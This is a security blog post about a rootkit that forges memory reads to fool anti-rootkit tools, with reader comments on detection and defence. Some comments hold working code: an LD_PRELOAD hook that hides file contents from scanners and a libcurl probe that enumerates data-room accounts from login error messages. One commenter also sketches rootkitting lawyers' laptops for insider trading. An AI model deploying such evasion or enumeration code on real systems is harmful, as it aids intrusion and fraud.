Forged Memory

A scary development in rootkits:

Rootkits typically modify certain areas in the memory of the running operating system (OS) to hijack execution control from the OS. Doing so forces the OS to present inaccurate results to detection software (anti-virus, anti-rootkit).

For example, rootkits may hide files, registry entries, processes, etc., from detection software. Since rootkits typically modify memory to do this, anti-rootkit tools inspect memory areas to identify such suspicious modifications and alert users.

This particular rootkit also modifies a memory location (installs a hook) to prevent proper disk access by detection software. Let us say that location is X. It is noteworthy that this location X is well known for being modified by other rootkit families, and is not unique to this particular rootkit.

Now since the content at location X is known to be altered by rootkits in general, most anti-rootkit tools will inspect the content at memory location X to see if it has been modified.

[…]

In the case of this particular rootkit, the original (what’s expected) content at location X is moved by the rootkit to a different location, Y. When an anti-rootkit tool tries to read the contents at location X, it is served the contents of location Y. So the anti-rootkit tool, thinking everything is as it should be, does not warn the user of suspicious activity.
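In rough terms the trick looks like the following minimal user-space sketch (all names and byte values are invented for illustration; a real rootkit does this inside the kernel, trapping the scanner’s reads rather than wrapping them in a function):

/* forged_read.c -- toy model of the X -> Y read redirection */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define REGION 8

static uint8_t loc_x[REGION] = {0x55, 0x48, 0x89, 0xe5, 0x90, 0x90, 0x90, 0xc3}; /* location X */
static uint8_t loc_y[REGION];                                                    /* location Y */

static void install_hook(void)
{
    memcpy(loc_y, loc_x, REGION);    /* stash the original contents of X at Y */
    memset(loc_x, 0xCC, REGION);     /* overwrite X with the rootkit's hook */
}

/* The read path a scanner is forced through once the rootkit is in control. */
static void forged_read(const uint8_t *addr, uint8_t *out, size_t n)
{
    if (addr >= loc_x && addr < loc_x + REGION)
        memcpy(out, loc_y + (addr - loc_x), n);   /* reads of X are served from Y */
    else
        memcpy(out, addr, n);                     /* everything else passes through */
}

int main(void)
{
    uint8_t buf[REGION];
    install_hook();
    forged_read(loc_x, buf, sizeof buf);
    printf("scanner sees 0x%02x at X; the actual byte there is 0x%02x\n", buf[0], loc_x[0]);
    return 0;
}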

Posted on May 6, 2011 at 12:32 PM

Comments

Craig May 6, 2011 12:40 PM

MS-DOS viruses were doing this sort of thing 20 years ago. It’s not really a new development.

ole May 6, 2011 12:40 PM

Way back when, a member of the Stoned family used this technique. Monkey hooked an interrupt so you could not get to the C: drive, but if you used fdisk to view the partition table then you bumped it off the hook and could proceed to remove it! Has the criminal element figured out what we know yet?

ole.

Todd Knarr May 6, 2011 12:52 PM

Not new. This sounds like standard stealth-virus behavior. Hook into the interrupt vectors, for instance, and set page protection up so that if something executed the hook it ran what the virus had planted there, but a normal (non-execution) read of that memory triggered a fault that let the virus substitute the original data – so someone scanning the interrupt vector memory wouldn’t see the virus’s hook in place. That in turn was derived from disk-related stealthing: hook the disk I/O routines and check where the read of an infected file/area is coming from. If it’s part of a load or execution, let it have the modified data. If it’s something just trying to read it as data, substitute the original data so disk scans don’t see the virus.
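A modern user-space analogue of that disk half is an LD_PRELOAD interposer. The sketch below is hypothetical (the file path is invented, and zeroed bytes stand in for “the original data”); it serves substitute contents to anything that merely reads the “infected” file as data:

/* stealth_read.c -- build: gcc -shared -fPIC stealth_read.c -o stealth.so -ldl
 * then run a "scanner" as: LD_PRELOAD=./stealth.so cat /tmp/infected.bin */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <fcntl.h>
#include <stdarg.h>
#include <string.h>
#include <unistd.h>

#define INFECTED_PATH "/tmp/infected.bin"   /* hypothetical infected file */

static int infected_fd = -1;

int open(const char *path, int flags, ...)
{
    static int (*real_open)(const char *, int, ...);
    va_list ap;
    int mode = 0;

    if (!real_open)
        real_open = dlsym(RTLD_NEXT, "open");
    va_start(ap, flags);
    if (flags & O_CREAT)
        mode = va_arg(ap, int);      /* mode argument only present when creating */
    va_end(ap);

    int fd = real_open(path, flags, mode);
    if (fd >= 0 && strcmp(path, INFECTED_PATH) == 0)
        infected_fd = fd;            /* something is reading the infected file as data */
    return fd;
}

ssize_t read(int fd, void *buf, size_t count)
{
    static ssize_t (*real_read)(int, void *, size_t);
    if (!real_read)
        real_read = dlsym(RTLD_NEXT, "read");

    ssize_t n = real_read(fd, buf, count);
    if (fd == infected_fd && n > 0)
        memset(buf, 0, (size_t)n);   /* substitute "clean" data for the scanner */
    return n;
}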

Stuff like this is the reason for the fundamental rule: you can’t scan for an infection using the potentially infected system, because if it’s infected it can lie to your scanning software.

KevC May 6, 2011 1:10 PM

It is true that this technique may not be new to a lot of experienced people. However, the significance here (as pointed out by Bruce) is that older techniques have been harder to implement in modern operating systems.

Now that methods of getting code up into those areas of the OS have been found again, the older techniques can come back into mainstream usage… and that’s a scary thought.

Cat and mouse. The next generation of operating systems will prevent this type of low-level rooting once again, and following that we will see someone else figure out how to get past it – bringing this code-migration technique back into the limelight again and again.

Michael T. Babcock May 6, 2011 1:17 PM

Certain operating systems are wiser and use randomised memory locations to avoid many such attacks. This is an old technique and an OS that doesn’t plan around it is just lazy.

sigquit May 6, 2011 1:38 PM

Well, isn’t this the modern-day equivalent of the good old INT 21h hooking?

Tony May 6, 2011 1:44 PM

Shouldn’t a good rootkit detector run from a separate OS environment (booted from a CD or USB stick)? If the BIOS has been compromised, this is no good, but it should avoid most of the usual ways that rootkits hide themselves from detection.

staudenmaier May 6, 2011 2:01 PM

Most rootkits I’ve seen hide in something like a hard disk driver file (*.SYS), which can be replaced with a clean copy. I depend, however, on antivirus software to spot the rootkit in memory, so this is indeed a nasty development.

staudenmaier May 6, 2011 2:07 PM

But booting OUTSIDE the regular OS will definitely help clean these things out.

Brendan Kidwell May 6, 2011 2:14 PM

I’m not an operating system or virtualization expert, but my understanding is that if you’re running a hypervisor under the actual OS that thinks it’s in charge, redirecting reads for a particular block of memory depending on who is trying to read them isn’t all that surprising.

You MIGHT be able to counteract this if you measure the difference in timings for accessing memory location X versus other locations unlikely to have been tampered with.
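For what it’s worth, a crude version of that measurement might look like this (x86, GCC/Clang; the iteration count is arbitrary, and a real probe would need fences and proper statistics rather than a single average):

/* time_probe.c -- compare read latency at a suspect location vs. a baseline */
#include <stdio.h>
#include <stdint.h>
#include <x86intrin.h>              /* __rdtsc; GCC/Clang on x86 only */

static uint64_t avg_read_cycles(volatile const uint8_t *p, int iters)
{
    uint64_t total = 0;
    for (int i = 0; i < iters; i++) {
        uint64_t t0 = __rdtsc();
        (void)*p;                   /* the read being timed */
        total += __rdtsc() - t0;
    }
    return total / (uint64_t)iters;
}

int main(void)
{
    static uint8_t baseline[64], suspect[64];  /* stand-ins for "other locations" and X */
    printf("baseline: %llu cycles\n", (unsigned long long)avg_read_cycles(baseline, 100000));
    printf("suspect:  %llu cycles\n", (unsigned long long)avg_read_cycles(suspect, 100000));
    /* a hypervisor trapping and emulating reads of X would add thousands of cycles */
    return 0;
}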

Roy May 6, 2011 2:42 PM

I use a shell script to check that reported free space is really there. It repeatedly calls …

dd if=/dev/zero of=/tmp/$s bs=1g count=1

… writing the iteration number to standard output each pass until all available free space is overwritten, then deletes those files. If it fails to reach the right number, then I know the free-space accounting has been gaffed.

Clive Robinson May 6, 2011 3:28 PM

This is not new, as many people have pointed out, and as one person has pointed out it’s “a cat and mouse game” that unfortunately has no end in a single-CPU architecture.

The simple solution is to have a separate state machine acting as a hypervisor. Every so often it halts the main CPU and scans a block of OS “read only” memory; if it does not find the correct hash value it raises an exception (what is done with this is another matter).

The state machine does not have to scan the whole OS memory in one go, because the CPU has no idea which block is going to be scanned next, or when (it’s halted and thus is effectively only aware that time has passed).
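In sketch form the checker’s loop might look like the following, where plain memcpy stands in for whatever bus or DMA mechanism the state machine uses to read the halted CPU’s memory, FNV-1a stands in for a proper cryptographic hash, and the block layout is invented:

/* scan.c -- random-order integrity scan of a supposedly read-only region */
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define BLOCK  4096
#define BLOCKS 16

static uint8_t os_text[BLOCKS * BLOCK];   /* stand-in for the OS's read-only memory */
static uint64_t known_good[BLOCKS];       /* hashes recorded at a known-clean boot */

static uint64_t fnv1a(const uint8_t *p, size_t n)
{
    uint64_t h = 0xcbf29ce484222325ULL;
    while (n--) { h ^= *p++; h *= 0x100000001b3ULL; }
    return h;
}

int main(void)
{
    for (int i = 0; i < BLOCKS; i++)      /* baseline, taken while provably clean */
        known_good[i] = fnv1a(os_text + i * BLOCK, BLOCK);

    for (int pass = 0; pass < 1000; pass++) {
        int i = rand() % BLOCKS;          /* the CPU cannot predict which block, or when */
        uint8_t copy[BLOCK];
        memcpy(copy, os_text + i * BLOCK, BLOCK);     /* the "DMA read" */
        if (fnv1a(copy, BLOCK) != known_good[i]) {
            fprintf(stderr, "block %d modified -- raising exception\n", i);
            return 1;
        }
        /* halt-the-CPU / sleep step elided */
    }
    return 0;
}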

For those few who forever argue that there can be “perfect AntiVirus / AntiMalware / AntiRootkit” software running on a single CPU: they are wrong, it cannot be done (you can get very close, but 99.99…% is not 100% and never will be). This fact was known and accepted by the mathematical community before the first electronic computers were built. The problem is that no system of logic that is realistically of any use can be used to describe / check itself.

However, that aside, the simple fact is there are a number of sufficiently good OSs out there (and no, I’m not talking *nix) that can better use the hardware security features currently built into commodity CPUs, such that this sort of attack is currently unlikely to succeed (whether this will remain the case in the future is another issue).

Will May 6, 2011 4:04 PM

Keen as we all are to shout “prior art” and feel superior – the articles I’ve read picking this up say such techniques have been talked about before – it is a first for a real live rootkit in the wild, right?

asd May 6, 2011 4:21 PM

If rootkits have to stay in non-paged memory, couldn’t you compare the size of a device driver to its non-paged memory? If they are the same, it probably is a rootkit?

Someone May 6, 2011 4:22 PM

ShadowWalker did that; the presentation was at Black Hat ’05 and the code for the TRON rootkit is publicly available. Hardly something new.

Dom De Vitto May 6, 2011 5:35 PM

I think “Trusteer Rapport” (among other things) checks that the call gates and hooks are in line with a ‘normal’ Windows system, and replaces unknown hooks.

All pretty standard ‘find something that doesn’t look right’ detection – an uncommon, but obviously useful, approach.

Maybe someone should tell the AV companies to stop with the snake-oil and enterprise GUIs and actually bring their products into the 21st century 🙁

Richard Steven Hack May 6, 2011 6:01 PM

There are two problems here:

1) First, if the rootkit is running in memory and you try to detect it using a tool on the running system, the rootkit will beat you.

2) If you boot from an external OS such as Ultimate Boot CD For Windows (UBCD4Win), the rootkit is not running in memory so unless you have a file signature, you won’t detect it.

The only program I know of that attempts to cover these situations is Malwarebytes Antimalware, which is specifically recommended to be run on the compromised running system in order to detect these sorts of malware. It is not recommended to run it from a boot CD as its effectiveness is greatly reduced.

The problem with that, of course, is that the malware can be designed to detect and disable Malwarebytes.

A-a-a-n-n-d-d-d we’re back to square one. 🙂

Probably the only way to deal with this sort of thing is to run ALL the rootkit detectors both from the compromised system and from a boot CD. That at least forces the malware designer to defeat ALL the detection systems specifically.

It would be even better if an AV detector could be designed that boots the compromised system into a VM and checks the running virtual system from an external position on an external bootable host.

Designing something like that which could be used by normal end users is probably impossible. Even getting one usable by knowledgeable techs probably would be difficult. This is because the external checking tools would have to be very low level and would require considerable system programming knowledge to interpret the results – unless they were totally automated to remove any possible rootkit or repair the system to spec, thus removing the rootkit.

Nick P May 6, 2011 11:25 PM

@ Richard Steven Hack

“Probably the only way to deal with this sort of thing is to run ALL the rootkit detectors both from the compromised system and from a boot CD.”

That’s how Microsoft’s Strider GhostBuster rootkit detector works. I don’t think it covers this attack vector currently.

“It would be even better if an AV detector could be designed that boots the compromised system into a VM and checks the running virtual system from an external position on an external bootable host.”

I don’t think it would be as hard as you make it sound. An academic paper a year or two ago published an evil-maid-type attack that hooks into a hibernated system as it boots back up, which is much scarier than this attack. But that same technique might be reapplied to detect this kind of infection.

Rob May 7, 2011 8:44 AM

@Eam:

Unless that’s a bad link, that’s a completely different technique. Or rather, that’s not what’s doing the forging. There’s no mention of the debug registers there.

@Dom De Vitto:
That’s the point of this rootkit. It breaks things like that.

markus May 7, 2011 11:12 AM

Boring – and ShadowWalker is a bad copy of Joanna Rutkowska’s DMA northbridge rootkit.

Kevin May 7, 2011 4:21 PM

Like a few have said, definitely not new (it seems to be a variation on http://www.phrack.org/issues.html?issue=65&id=8#article), but it’s interesting to see that despite this, the anti-virus vendors don’t seem to be prepared for it. It makes me wonder if it’s already been in the wild for a while and it’s only now that they’ve actually noticed it.

Clive Robinson May 8, 2011 12:11 AM

@ Eam,

“Imagine the threats we’d be facing if these virus writers actually did a bit of googling before firing up the IDE.”

Err, you appear to be forgetting the principle of ‘the low hanging fruit’.

That is, why, as an attack developer, would you use an attack any more sophisticated than one that ‘gets the job done’?

The only reason for doing so is ‘longevity’, and this will always be tempered by ‘expected detection time’.

If your attack is designed to steal credit card numbers and you (or others) use them fairly immediately, then you would expect people to be looking for your attack code no more than three months after you start using the credit card info.

As credit card info ages fairly quickly (i.e. cards expire two years after issue), you want to use them whilst they are still ‘fresh’.

[To see how fast they age, make a simple assumption: you steal 1 million unique CC records from a company’s sales reconciliation system. With a 2-year expiry time you would expect 1/(365*2), or 0.137%, to become invalid for every day after their last use. So you would expect 0.137% of the cards used yesterday to be not working, 50% of those used one year ago, and all of those used two years or more ago. If the million unique records are spread evenly across one year, that’s 2740 records for each day. So you would expect 3.75 of the cards used yesterday to now be invalid, 7.5 from the day before, and 1370 of the cards used a year ago today. You can therefore see you would expect 1/4, or 250,000 records, to be invalid on the day you steal them, and to lose another 1370/day thereafter; thus only 1/4 would still be valid after a year.]
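For anyone who wants to check the arithmetic, a few lines of C reproduce those figures under the stated assumptions:

/* cc_decay.c -- reproduce the figures in the bracketed example above */
#include <stdio.h>

int main(void)
{
    const double per_day = 1e6 / 365.0;          /* ~2740 records per daily cohort */
    const double decay = 1.0 / (365.0 * 2.0);    /* 0.137% invalid per day of age */

    double invalid = 0.0;
    for (int age = 1; age <= 365; age++)         /* cohort ages on the day of the theft */
        invalid += per_day * decay * age;

    printf("invalid on the day of theft: %.0f of 1000000 (about 1/4)\n", invalid);
    printf("further records lost per day: %.0f\n", 365.0 * per_day * decay);
    return 0;
}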

So depending on how the card info is exploited, it might take two months for a complaint to be made to the CC companies, and investigators another two or three months to collect sufficient data to correlate the information and then find the code etc. responsible. At which point the code, no matter how good, will get blocked.

So effectively, with only a 4-5 month life span, you would use the first attack that worked.

However with something like an APT stealth attack you are looking at the life span of the OS as the upper limit, so four to six years. So a carefully selected vector with a carefully crafted agent would be expected.

As a consequence you would expect to see many, many times the number of quick and dirty attacks for short-lived CC data than you would for a stealth APT. Which appears to correlate with what we do see (Stuxnet being the only example of APT code that most people are aware of).

Doug Coulter May 8, 2011 10:51 AM

Clive, you’ve hit it on the head again. But CCs aren’t the only possible targets for malware – just, as you say, “the low hanging fruit”.

Consider some other possibilities. “High net worth individuals” might be one. Many, being human, are up to this and that, and knowing just what could allow you to siphon some money off them – blackmail, or just following a big stock trader and front-running his trades.

Another is a big company, big enough that invoicing and purchasing isn’t fully tracked by a single individual. Getting into their system to have it send you money against fake PO’s might have a rather long lifetime if you’re not too greedy and just create a flow of money.

So, for a criminal, there’s a use for a long lived rootkit that can simply send info back to the controller for uses other than swiping a CC with a short life. Done right, the victim never even realizes there’s a rootkit there – you just use the gathered information in other ways.

Think “insider trading” if you breach a law firm that does mergers…just for one. All you need from the target is info, and you never attack them to make them aware of the problem.

You might not need to change many bits in the target system at all — maybe none, or just adding your fake money dump to their “approved vendors” list.

Luckily, most criminals don’t realize that you can make good money with the same skills wearing the other color hat – and with a lot less risk. I suspect that for very high value targets though, this has been and is being done — and by the very nature of it, doesn’t get reported.

Nick P May 8, 2011 4:15 PM

@ Clive Robinson

“Stuxnet being the only example of APT code that most people are aware of”

Actually, I think most people have heard of the Windows and UNIX family of operating systems. They are currently the most sophisticated APT’s available. They facilitate monitoring, stealth, massive data exfiltration, MITM, subversion and deception for social engineering attacks. You know you have the best rootkit when the next best rootkits (e.g. Zeus and Stuxnet) leverage your functionality to get the job done. 😉

RobertT May 8, 2011 9:38 PM

@Doug Coulter
“Think “insider trading” if you breach a law firm that does mergers…just for one. All you need from the target is info, and you never attack them to make them aware of the problem.”

I’ve mentioned M&A as a huge security problem a few times over the last year, but most people don’t seem to understand the value of this data, or even just the metadata associated with “virtual data room” access.

Each of these “virtual data room” systems requires the users to download and install a secure communications tool that enables the whole “virtual data room comms” process. Ideally I want to rootkit their “secure system” software; that way I’m in on every deal from day one AND I get to view the progress of the DD (due diligence).

Alternatively, I intentionally rootkit the laptops of the lawyers of any aggressive acquirer. Any M&A DD must involve the head of the legal team, so I’m in the door real early. The thing is, I don’t really need to know the exact details or snoop on the encrypted packets, because I know that most M&As occur at valuations 30% above the average trading level for the past 6 months. A three-month investment for a 30% low-risk return! I’m in! Also, the earlier you are in, the less suspicious it looks to any SEC investigator. Naturally it also helps if you don’t reside in the US (see the recent HK insider trading cases that were dropped).

So I think tightly targeted rootkits are a huge problem that the M&A industry is completely ignoring. I seriously doubt that the criminal hackers are obliging by also ignoring this “low hanging fruit”.

Sometimes the metadata is completely insecure. Simple examples that I’ve seen include:

The access account name is the actual name of the target company: the error message for a failure to log into the data room is different if a data room exists under that company name than if there is no data room. Conclusion: the data room exists!

Data room access accounts are usually established in the names of the potential acquirers: a failed login under that userID (the acquirer’s company name) produces a different error message when the userID exists than when it does not.

The virtual data room “secure system” software is honestly that pathetic!
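Probing that sort of oracle is a few lines of code. A rough sketch with libcurl (the endpoint URL and form field names are entirely invented, and a cheap fingerprint stands in for a proper diff of the two error pages):

/* probe.c -- error-message oracle sketch; link with -lcurl */
#include <stdio.h>
#include <curl/curl.h>

static size_t sink(char *ptr, size_t size, size_t nmemb, void *userdata)
{
    unsigned long *fp = userdata;
    for (size_t i = 0; i < size * nmemb; i++)
        *fp = *fp * 31 + (unsigned char)ptr[i];   /* fingerprint the error page */
    return size * nmemb;
}

static unsigned long try_login(const char *user)
{
    CURL *curl = curl_easy_init();
    unsigned long fp = 0;
    char post[256];

    snprintf(post, sizeof post, "user=%s&pass=wrong", user);
    curl_easy_setopt(curl, CURLOPT_URL, "https://dataroom.example.com/login");
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, post);
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, sink);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, &fp);
    curl_easy_perform(curl);                      /* deliberately failing login */
    curl_easy_cleanup(curl);
    return fp;
}

int main(void)
{
    curl_global_init(CURL_GLOBAL_DEFAULT);
    unsigned long target   = try_login("TargetCompanyName");
    unsigned long baseline = try_login("zzz-no-such-room");
    puts(target != baseline ? "error pages differ: a data room exists for that name"
                            : "no information leaked");
    curl_global_cleanup();
    return 0;
}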

smartGuy May 8, 2011 11:13 PM

Actually this is a new development. It is not just a simple case of hooking interrupt vectors if this works under Windows. Windows clears all ISRs before switching into protected mode. In order to perform this move, modifications to the kernel image must have been performed from real mode whilst avoiding checksum checks.

Clive Robinson May 9, 2011 6:56 AM

@ Nick P,

“Actually, I think most people have heard of the Windows and UNIX family of operating systems”

8)

However you raise a point we tend not to hear much spoken about,

“They facilitate monitoring, stealth, massive data exfiltration…”

In some respects the monitoring and data exfiltration is what the attack is all about these days.

That is, times have changed; those getting into your systems these days are mainly doing it for profit, not vanity or bragging rights. The script kiddie attacks and web site defacements are by no means dead, but they are at best a side show these days.

However what are the majority of organisations defending against?

Mainly ‘known attack vectors’ getting through the firewall.

But in most cases not the outbound data from those attacks that got through the firewall one way or the other (i.e. pushed by the attacker or pulled in by a user clicking on something).

To me this has always seemed a bit daft. It’s a bit like an old medieval town where the gate keepers are busy making sure that all inbound goods have the correct revenue applied, but ignore the outbound waggons, one of which has the contents of the less than well guarded treasury on board.

One example was the modified version of the Zeus attack on .mil and .gov that hoovered up .doc and .pdf files. It was only discovered because a network admin saw huge spikes in outbound traffic.

The problem is that many network etc. admins are like those gate keepers: they are too busy checking inbound traffic for contraband and ignoring outbound traffic with the crown jewels.

You need to do both just as diligently, because there will always be unknown attacks that get through the firewall, AV and malware detectors, file system trip wires, etc.

As we know from the recent press, some security-related firms appear to be trying to do this (lastpass.com) and some appear not (RSA, Sony, etc.).

One of the things that does kind of make me wonder what people are thinking is when you hear the China APT mob go on about the removal of data in gigabyte and terabyte quantities from individual sites or organisations. Surely these organisations can’t be so large that that level of network traffic does not show up in the logs?

Paeniteo May 9, 2011 6:59 AM

@Richard Steven Hack:
“It would be even better if an AV detector could be designed that boots the compromised system into a VM and checks the running virtual system from an external position on an external bootable host.”

I remember reading a paper which argued that it is ultimately impossible to hide the fact that you are running inside a VM from a process within the VM (all mitigations introduce new detectable “oddities” which would need to be mitigated again, and so on). Hence, the rootkit could detect the scanner, resulting in (to put it in your own words):

“A-a-a-n-n-d-d-d we’re back to square one. :-)”

😉

Clive Robinson May 9, 2011 9:20 AM

@ Paeniteo,

“Hence, the rootkit could detect the scanner,”

In theory yes, in practice “could” works both ways and is thus probabilistic in nature.

It is also critically dependent on the resources available to it. The rootkit requires memory and CPU resources to detect the scanner and camouflage itself. If it does not have enough of either, then it cannot achieve the detection, the camouflage, or both…

Further, the scanner can use the same techniques to detect the rootkit as the rootkit uses to detect the scanner. However, the scanner can actually have the advantage, especially if it runs outside of the general computing environment the rootkit is occupying.

Consider it this way: the rootkit is trying to occupy the highest privileged position it can within the general computing environment, either above or as part of the OS (or, with some OSs, the drivers). Ask what happens if it cannot occupy that position.

What if that high ground position is occupied by a hypervisor running in its own environment outside of the general computing environment?

And what if the OS the rootkit is trying to supplant is in a resource-limited environment?

Then there is the issue of the OS “signature”: the OS in its normal state performs certain actions in certain ways and uses a known set of resources such as memory and CPU cycles.

That signature can be monitored and aberrant behaviour detected.

Admittedly our current commodity OSs are written in a monolithic manner, which makes the signature overly complex to monitor currently. However, some microkernels can be re-written in ways that make monitoring the signature much, much easier.

The step people have to make is getting away from the CPU monitoring itself, and thinking about a hypervisor running in its own hardware environment.

We can actually do this today with a number of DMA interfaces, one of which (Firewire) has already been highlighted for “black hat” activities. It could just as easily be used for “white hat” activities, like a security hypervisor.

kashmarek May 9, 2011 10:19 AM

Recently, I saw an advertisement for a new PC, that allowed internet access without booting into the OS on the disk drive. I believe one of the BIOS makers tried to sell this as an option a couple of years back. Thus, it would seem that the BIOS (or firmware) is already at the point where it can run the computer without your OS and effectively be elevated to a full time always live undetectable rootkit when your OS is running.

Paeniteo May 9, 2011 10:29 AM

@Clive: ‘”could” works both ways’

Yes, and that’s the kind of permanent, reciprocal hide-and-seek game Richard and I were referring to.
I just meant to point out that having the rootkit inside a VM and the scanner outside of it does not solve the problem.
I don’t even think that throwing in dedicated hardware solves that problem (although it would certainly make it harder to detect the scanner and/or hide from it, just as the VM would). Or, to put it the other way round, introducing dedicated hardware makes the issue boring, as we might then just as well think along the lines of trusted micro-kernels sealed by TPMs.

Siv May 9, 2011 12:14 PM

These hackers have no fear.
They weigh risk vs reward, and these crimes are profitable with little if any risk to them.
If they faced consequences, REAL consequences, they would find another line of work, or their government employers might change their job titles.

Dirk Praet May 9, 2011 1:03 PM

@ Clive

“Admittedly our current commodity OS’s are written in a monolithic manner which makes the signature overly complex to monitor”

Exactly. Which is why I like OS level virtualisation capabilities such as Solaris zones that can provide separate security domains for different applications. Much easier to monitor.

Davi Ottenheimer May 9, 2011 1:43 PM

I suspect it has a lot to do with the reaction of the investigator. Option 1) report a stunning new development to the press or Option 2) research whether this is new. The reporter also could have done a bit of fact checking with other investigators to confirm the newness.

For what it’s worth, this was my take on a similar finding during an investigation I worked on last March:

http://www.flyingpenguin.com/?p=11118

“Now it seems so commonplace as to be obvious to manipulate memory, and even incorporated into regular development, but back [in 2005] it was Phrackworthy.”

Nick P May 9, 2011 3:56 PM

@ Dirk Praet

OS-level virtualization is only as trustworthy as the OS it runs on and its sharing mechanisms. In this light, it poses fewer issues than full virtualization because things can be more deprivileged and better controlled. However, it’s still a large attack surface. That’s why I favor the compromise of using microkernel platforms and user-mode Linux VMs. It lets us isolate security-critical code in a robust way, minimize kernel code, have separate security domains in different VMs, and reuse legacy drivers and software until more isolated versions are written. Karger taught me the value of producing a series of interim products of increasing assurance to keep a project going.

Perseus/Turaya is a nice example
http://www.emscb.com/content/pages/49558.htm

Jason May 9, 2011 5:09 PM

I think there may be a subconscious element at play, too.

What we’ve learned in recent years about computer programming and programmer cognition is that, in general terms, the longer a bug has existed, the harder it is to fix.

When a programmer writes a new bug, the code is fresh in their head, and they can recall the code and speculate about a fix quite easily. Comparatively speaking of course.

Similarly, the detection and counteracting recommendations are still fresh in the minds of the discoverer, the ‘experts’ and the affected parties.

You can speculate from this that if you deploy an exploit right after the paper gets published, it would actually get fixed sooner than if you waited three months for everyone to start to forget about it.

Clive Robinson May 10, 2011 5:03 AM

@ Kashmarek,

“Thus, it would seem that the BIOS (or firmware) is already at the point where it can run the computer without your OS and effectively be elevated to a full time always live undetectable rootkit when your OS is running.”

The BIOS’s ability to run without a disk-loaded OS has been around since before the earliest IBM PCs. For instance, the Apple ][ had a BASIC interpreter built in, with (if you knew how to do it) the ability to have a number of programs in RAM at the same time. There have even been embedded versions of *nix in high-end microcontrollers (and for embedded systems you don’t need the MMU; you don’t on other systems either, as it’s mainly a convenience for the loader/linker).

However, the BIOS’s ability to act as a security hypervisor won’t, in the ordinary scheme of things, work, because it shares the same memory and CPU. Thus the CPU either needs to have the required extended hardware built in, or it needs to be added. Arguably the Intel platform (if it was bug free, which it’s not) could provide this.

However, there is a subtle issue even when the hypervisor memory and CPU are (apparently) isolated from the main CPU and memory. If the hypervisor is not written in the right way, then the main memory it sees can end up being interpreted as code. Thus the hypervisor needs to be implemented as a state machine whose states are all known, where data from the main memory can only cause an exception and nothing else. This way the state machine hypervisor fails safe.

@ Siv,

“These hackers have no fear. They weigh risk vs reward, and these crimes are profitable with little if any risk to them.”

These two sentences are at variance with each other. If they had “no fear” they would not “weigh risk vs reward”; they would simply go for the reward.

You further say,

“If they faced consequences, REAL consequences, they would find another line of work, or their government employers might change their job titles.”

In the main, the prosecution of cross-jurisdictional-border crime is treated in a similar way to a “suspect who has taken flight”, that is, via extradition treaty. However, many countries either do not have extradition treaties or, as in the case of Russia and China, have legal exceptions for those acting under state authority or not actually present at the scene of the crime. Other nations (Israel being one) will not extradite people of certain faiths to other countries seen not to be of that faith.

For real consequences to happen, people need to be tried and convicted either in the country where they committed the crime or in some other, impartial third-party nation. Currently we don’t have the legal mechanism in place except for War Crimes, Crimes Against Humanity and Piracy on the High Seas.

As has been seen with European law (equivalence of court sentences and enforcement across the EU, and the European Arrest Warrant), any such process is open to complete abuse. Further, the asymmetrical agreement between the US and UK that was supposedly for use against terrorists has been and is being abused.

Clive Robinson May 10, 2011 5:37 AM

@ Nick P,

From some of what you have said in the past, it seems you have played with DMA over Firewire as a way of getting around various OS / CPU locks.

Have you ever thought about doing a memory checking hypervisor over Firewire?

For instance, if the microkernel was made sufficiently lightweight, with the code written to be as static as possible (i.e. relative not absolute branches and jumps, calls via base and table offset) and with minimal jump tables for other activities, then checking the memory image via DMA could be fast and in many cases non-intrusive to the activities of the target CPU.

Further, if the microkernel was written in such a way that any detected anomalies could be corrected by the DMA process, it would make exploits difficult.

Further, why not actually load the microkernel into the target CPU from the Firewire DMA? That way malware could not get at it (assuming the code was written correctly), as it would not be stored on locally accessible semi-mutable media.

Just something for you to think on as, say, the next step on from your current microkernel solution.

acer May 29, 2011 4:50 AM

If a CPU can work out a+b in probably thousands of ways, how could the program itself not be able to work out that it has changed?
I was thinking: if a user-mode program was trying to work something out and a rootkit changed it, couldn’t the program find it?

acer May 29, 2011 5:10 AM

I’m trying to create an anti-virus that will detect and remove rootkits etc. If anyone has ideas, can you send me an email? (ask mod)
Thanks
